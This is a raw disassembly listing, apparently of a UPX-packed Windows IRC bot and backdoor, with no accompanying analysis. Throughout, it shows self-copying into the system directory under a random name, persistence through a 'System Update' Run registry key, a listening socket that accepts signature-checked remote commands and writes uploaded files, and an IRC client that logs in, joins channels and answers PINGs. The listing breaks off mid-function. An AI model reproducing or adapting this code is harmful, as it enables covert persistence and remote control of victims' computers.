lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315025E8
push ebx
push edi
push esi
call sub_315023AF
lea eax, [ebp+var_138]
push eax
call sub_31502490
add esp, 10h
loc_315025E8: ; CODE XREF: sub_31502548+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_315025B1
pop edi
pop esi
pop ebx
leave
retn
sub_31502548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025F6 proc near ; CODE XREF: sub_315026C2+D1�p
; sub_315026C2+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3150260B
push [ebp+arg_0]
call dword_31501094 ; DeleteFileA
loc_3150260B: ; CODE XREF: sub_315025F6+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068 ; GetSystemDirectoryA
test eax, eax
jz locret_315026C0
push esi
call dword_31501124 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31505CF0 ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_315010A0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_3150243D
add esp, 14h
push ds:dword_31506164
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074 ; WinExec
push 1F4h
call dword_315010A4 ; Sleep
push 0
call dword_3150109C ; ExitProcess
pop esi
locret_315026C0: ; CODE XREF: sub_315025F6+23�j
leave
retn
sub_315025F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315026C2 proc near ; CODE XREF: UPX0:31501D64�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060 ; GetModuleFileNameA
test eax, eax
jz loc_315027FB
and ds:dword_315061A0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_31502748
call dword_31501124 ; rand
push 0Ah
mov ebx, offset aZvhkaqndgcmpya ; "zvhkaqndgcmpyawrkj"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_3150243D
add esp, 14h
jmp short loc_31502757
; ---------------------------------------------------------------------------
loc_31502748: ; CODE XREF: sub_315026C2+4D�j
lea eax, [ebp+var_20]
push eax
push offset aZvhkaqndgcmpya ; "zvhkaqndgcmpyawrkj"
call dword_31501088 ; lstrcpyA
loc_31502757: ; CODE XREF: sub_315026C2+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_3150279D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_3150243D
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025F6
add esp, 1Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_3150279D: ; CODE XREF: sub_315026C2+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064 ; lstrcmpiA
test eax, eax
jnz short loc_315027E6
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315027FB
push ebx
push edi
push esi
mov ds:dword_315061A0, 1
call sub_315023AF
add esp, 0Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_315027E6: ; CODE XREF: sub_315026C2+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025F6
pop ecx
pop ecx
loc_315027FB: ; CODE XREF: sub_315026C2+1F�j
; sub_315026C2+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_315026C2 endp
; =============== S U B R O U T I N E =======================================
sub_31502800 proc near ; CODE XREF: sub_31501BA8+7A�p
; sub_315028AE+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C ; VirtualAlloc
retn
sub_31502800 endp
; =============== S U B R O U T I N E =======================================
sub_31502814 proc near ; CODE XREF: sub_315028AE+EB�p
; sub_31502B4C+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058 ; VirtualFree
retn
sub_31502814 endp
; =============== S U B R O U T I N E =======================================
sub_31502826 proc near ; CODE XREF: sub_31502B4C+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_31502826 endp
; =============== S U B R O U T I N E =======================================
sub_3150283F proc near ; CODE XREF: sub_31502B4C+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_3150286E
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_3150286E
push 1
pop eax
jmp short loc_3150288E
; ---------------------------------------------------------------------------
loc_3150286E: ; CODE XREF: sub_3150283F+1B�j
; sub_3150283F+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CF8
push dword ptr [esi]
call dword_3150101C ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3150288E: ; CODE XREF: sub_3150283F+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150283F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31502893 proc near ; CODE XREF: sub_31502B4C+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010 ; CryptDestroyKey
push 0
push dword ptr [esi+0Eh]
call dword_31501014 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31502893 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315028AE proc near ; CODE XREF: sub_31502B4C+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_31502800
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A44 ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150298F
jl short loc_3150291C
cmp ecx, 61C46800h
ja short loc_3150298F
loc_3150291C: ; CODE XREF: sub_315028AE+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150298F
jg short loc_3150292B
cmp ecx, 9E3B9800h
jb short loc_3150298F
loc_3150292B: ; CODE XREF: sub_315028AE+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000 ; CryptCreateHash
test eax, eax
jz short loc_31502980
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004 ; CryptHashData
test eax, eax
jz short loc_31502980
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_31502980
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008 ; CryptVerifySignatureA
test eax, eax
jnz short loc_315029A8
loc_31502980: ; CODE XREF: sub_315028AE+98�j
; sub_315028AE+AA�j ...
call dword_31501098 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
loc_3150298F: ; CODE XREF: sub_315028AE+62�j
; sub_315028AE+6C�j ...
call dword_31501098 ; RtlGetLastWin32Error
push 2
pop esi
loc_31502998: ; CODE XREF: sub_315028AE+117�j
push edi
call sub_31502814
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_315029A8: ; CODE XREF: sub_315028AE+D0�j
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
call dword_31501124 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C ; send
jmp short loc_31502998
sub_315028AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029C7 proc near ; CODE XREF: sub_31502B4C+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029E6
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B3E
; ---------------------------------------------------------------------------
loc_315029E6: ; CODE XREF: sub_315029C7+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AF7
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_31501048 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AE5
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A8D
inc [ebp+arg_4]
loc_31502A8D: ; CODE XREF: sub_315029C7+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502ADA
loc_31502A97: ; CODE XREF: sub_315029C7+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502ADA
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A97
loc_31502ADA: ; CODE XREF: sub_315029C7+CE�j
; sub_315029C7+E5�j
push [ebp+var_C]
call dword_315010BC ; CloseHandle
jmp short loc_31502B47
; ---------------------------------------------------------------------------
loc_31502AE5: ; CODE XREF: sub_315029C7+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502AF7: ; CODE XREF: sub_315029C7+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B26
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_31501048 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B26: ; CODE XREF: sub_315029C7+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B47
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B3E: ; CODE XREF: sub_315029C7+1A�j
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B47: ; CODE XREF: sub_315029C7+11C�j
; sub_315029C7+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B4C proc near ; DATA XREF: sub_31502BE8+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8 ; SetEvent
mov esi, 10000h
push esi
call sub_31502800
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502826
lea ecx, [ebp+var_18]
call sub_3150283F
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_315028AE
test eax, eax
jnz short loc_31502BC0
loc_31502B9B: ; CODE XREF: sub_31502B4C+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_31502BC0
test eax, eax
jz short loc_31502BC0
push eax
push edi
push [ebp+var_30]
call sub_315029C7
add esp, 0Ch
jmp short loc_31502B9B
; ---------------------------------------------------------------------------
loc_31502BC0: ; CODE XREF: sub_31502B4C+4D�j
; sub_31502B4C+5F�j ...
push edi
call sub_31502814
pop ecx
lea ecx, [ebp+var_18]
call sub_31502893
push [ebp+var_30]
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BE8 proc near ; DATA XREF: sub_31501D96+156�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A38 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502C19: ; CODE XREF: sub_31502BE8+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170 ; bind
test eax, eax
jz short loc_31502C43
inc esi
cmp esi, 0Ah
jl short loc_31502C19
loc_31502C43: ; CODE XREF: sub_31502BE8+53�j
push 32h
push [ebp+var_4]
call dword_31501174 ; listen
mov ebx, dword_315010BC
loc_31502C54: ; CODE XREF: sub_31502BE8+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_3150108C ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B4C
push esi
push esi
call dword_315010D0 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_31501090 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_31502C54
sub_31502BE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502CB7 proc near ; CODE XREF: sub_31502D3C+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CEA
add ebx, 1Ah
loc_31502CEA: ; CODE XREF: sub_31502CB7+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D14
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D14: ; CODE XREF: sub_31502CB7+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D34
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D34: ; CODE XREF: sub_31502CB7+68�j
mov al, [ebp+arg_0]
loc_31502D37: ; CODE XREF: sub_31502CB7+5B�j
; sub_31502CB7+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502CB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D3C proc near ; CODE XREF: sub_31503722+F7�p
; sub_31503722+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D97
mov edi, [ebp+arg_0]
push ebx
loc_31502D51: ; CODE XREF: sub_31502D3C+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502CB7
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D7B
cmp bl, 7Ah
jg short loc_31502D7B
movsx esi, bl
sub esi, 61h
loc_31502D7B: ; CODE XREF: sub_31502D3C+32�j
; sub_31502D3C+37�j
cmp bl, 41h
jl short loc_31502D8B
cmp bl, 5Ah
jg short loc_31502D8B
movsx esi, bl
sub esi, 41h
loc_31502D8B: ; CODE XREF: sub_31502D3C+42�j
; sub_31502D3C+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D51
pop ebx
jmp short loc_31502D9A
; ---------------------------------------------------------------------------
loc_31502D97: ; CODE XREF: sub_31502D3C+F�j
mov edi, [ebp+arg_0]
loc_31502D9A: ; CODE XREF: sub_31502D3C+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D3C endp
; =============== S U B R O U T I N E =======================================
sub_31502DA1 proc near ; CODE XREF: UPX0:3150346E�p
push esi
mov esi, ecx
push 20001h
call sub_31502800
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502DA1 endp
; =============== S U B R O U T I N E =======================================
sub_31502DB6 proc near ; CODE XREF: UPX0:315034CE�p
; UPX0:31503521�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502DB6 endp
; ---------------------------------------------------------------------------
loc_31502DD4: ; CODE XREF: UPX0:31503AD6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_31502814
push dword ptr [esi+2Ch]
call sub_31502814
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DEC proc near ; CODE XREF: UPX0:315034EC�p
; UPX0:3150353F�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198 ; connect
test eax, eax
jnz loc_31502FF1
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31502F15: ; CODE XREF: sub_31502DEC+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502F9E
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FF1
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502F15
; ---------------------------------------------------------------------------
loc_31502F9E: ; CODE XREF: sub_31502DEC+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FFF
loc_31502FF1: ; CODE XREF: sub_31502DEC+4E�j
; sub_31502DEC+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
push 1
pop eax
jmp short loc_31503021
; ---------------------------------------------------------------------------
loc_31502FFF: ; CODE XREF: sub_31502DEC+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31503021: ; CODE XREF: sub_31502DEC+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150302E proc near ; CODE XREF: sub_31502DEC+7C�p
; sub_31502DEC+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_315030A8
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_31503067
push 1
pop eax
jmp short loc_315030AA
; ---------------------------------------------------------------------------
loc_31503067: ; CODE XREF: sub_3150302E+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C ; send
loc_315030A8: ; CODE XREF: sub_3150302E+20�j
xor eax, eax
loc_315030AA: ; CODE XREF: sub_3150302E+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3150302E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315030B1 proc near ; CODE XREF: UPX0:3150358D�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C ; wsprintfA
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3150317A
test eax, eax
jz short loc_3150317A
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503153
push 3
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503153: ; CODE XREF: sub_315030B1+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503167
push 4
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503167: ; CODE XREF: sub_315030B1+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8 ; lstrcpynA
xor eax, eax
jmp short loc_3150317D
; ---------------------------------------------------------------------------
loc_3150317A: ; CODE XREF: sub_315030B1+74�j
; sub_315030B1+78�j
push 2
loc_3150317C: ; CODE XREF: sub_315030B1+A0�j
; sub_315030B1+B4�j
pop eax
loc_3150317D: ; CODE XREF: sub_315030B1+C7�j
